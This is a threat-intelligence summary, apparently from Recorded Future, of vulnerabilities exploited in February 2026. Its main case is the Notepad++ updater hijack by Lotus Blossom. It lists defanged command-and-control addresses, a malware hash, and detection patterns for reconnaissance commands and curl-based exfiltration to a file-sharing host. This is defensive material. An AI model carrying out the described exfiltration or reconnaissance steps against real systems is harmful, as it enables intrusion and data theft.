February 2026 brought a 43% decline in high-severity vulnerabilities compared to the previous month. Recorded Future's Insikt Group® tracked 13 vulnerabilities requiring urgent remediation, down from 23 in January 2026. Each carried a 'Very Critical' Recorded Future Risk Score.
Key findings for security teams:
- Microsoft dominates the landscape: Six vulnerabilities—46% of February's total—affected Microsoft products. CISA added all six to its Known Exploited Vulnerabilities catalog on the same day.
- Supply-chain compromise targets Notepad++: Lotus Blossom, a suspected Chinese state-sponsored group, weaponized CVE-2025-15556 to hijack Notepad++'s update mechanism, distributing Cobalt Strike Beacon and the Chrysalis backdoor.
- APT28 leverages MSHTML weakness: Russia's APT28 exploited CVE-2026-21513 through weaponized Windows Shortcut files to execute multi-stage attacks.
- Exploit code circulating: Four vulnerabilities have public proof-of-concept exploits available. A fifth allegedly has exploit code for sale.
Bottom line: The 43% drop in volume doesn't diminish the threat. February's vulnerabilities include confirmed nation-state exploitation and five remote code execution flaws, underscoring the need for intelligence-driven patch prioritization.
February 2026 Vulnerability Reference
All 13 vulnerabilities listed below were actively exploited during February 2026.
Table 1: Vulnerabilities actively exploited in February 2026 based on Recorded Future data. *An alleged exploit for CVE-2026-21533 is advertised for sale on GitHub. Recorded Future Triage captured the advertisement, viewable here via Replay Monitor. (Source: Recorded Future)
February 2026 Threat Landscape
Most Targeted Vendors
- Microsoft accounted for six vulnerabilities spanning Windows, Windows Server, Office, and Microsoft 365
- BeyondTrust disclosed a critical OS command injection flaw affecting Remote Support (RS) 25.3.1 and earlier, plus Privileged Remote Access (PRA) 24.3.4 and earlier
- Cisco faced active exploitation of an authentication bypass in Catalyst SD-WAN infrastructure
- Other affected vendors: Notepad++, Apple, Soliton Systems K.K., Google, Dell
Dominant Vulnerability Classes
- CWE-78 – OS Command Injection (most common, tied)
- CWE-693 – Protection Mechanism Failure (most common, tied)
- CWE-476 – NULL Pointer Dereference
- CWE-843 – Type Confusion
- CWE-807 – Reliance on Untrusted Inputs in a Security Decision
Confirmed Threat Actor Activity
Malware campaigns linked to specific vulnerabilities:
- Lotus Blossom (suspected Chinese state-sponsored) weaponized CVE-2025-15556 to intercept Notepad++ updates between June and December 2025. The operation rotated command-and-control servers across three distinct attack chains, delivering a Metasploit loader, Cobalt Strike Beacon, and the custom Chrysalis backdoor.
- APT28 (Russian state-sponsored) exploited CVE-2026-21513 via malicious Windows Shortcut files containing embedded HTML payloads. Network telemetry linked the activity to known APT28 infrastructure.
- UNC6201 (suspected Chinese nexus) leveraged CVE-2026-22769 to compromise Dell RecoverPoint for VMs appliances, installing the SLAYSTYLE web shell, BRICKSTORM backdoor, and GRIMBOLT—a C# backdoor compiled with native AOT to evade detection.
Extended exploitation timelines:
- UAT-8616 chained CVE-2026-20127 with CVE-2022-20775 to gain root access on Cisco Catalyst SD-WAN systems. Cisco Talos attributes the campaign to a sophisticated actor and assesses the activity dates to at least 2023.
Immediate Action Required: CVE-2025-15556
CVE-2025-15556 | Notepad++ Supply-Chain Compromise
Risk Score: 99 (Very Critical) | CISA KEV: Added February 12, 2026
Why this matters: Lotus Blossom hijacked Notepad++'s update mechanism to distribute malicious installers over six months, deploying Cobalt Strike and the Chrysalis backdoor to targeted users. The flaw exists in the WinGUp updater used by Notepad++ versions before 8.8.9, which fails to cryptographically verify update metadata and installer packages.
Affected versions: Notepad++ prior to 8.8.9 (upgrade to 8.9.1 recommended)
Immediate remediation steps:
- Deploy Notepad++ version 8.9.1, released January 26, 2026
- Hunt for malicious update.exe (SHA256: 4d4aec6120290e21778c1b14c94aa6ebff3b0816fb6798495dc2eae165db4566)
- Monitor for GUP.exe spawning unexpected child processes
- Inspect network connections to 45[.]76[.]155[.]202, 45[.]77[.]31[.]210, 45[.]32[.]144[.]255, or 95[.]179[.]213[.]0
- Search for ProShow directories under %APPDATA% or suspicious files in %APPDATA%\Adobe\Scripts\
- Alert on curl.exe uploading to temp[.]sh
Known command-and-control infrastructure: 45[.]76[.]155[.]202, 45[.]77[.]31[.]210, cdncheck[.]it[.]com, safe-dns[.]it[.]com, 95[.]179[.]213[.]0
Detection resources: Insikt Group developed Sigma rules to identify update.exe executing reconnaissance commands (whoami, tasklist, systeminfo, netstat -ano) and curl-based exfiltration. Rules are available to Recorded Future customers.
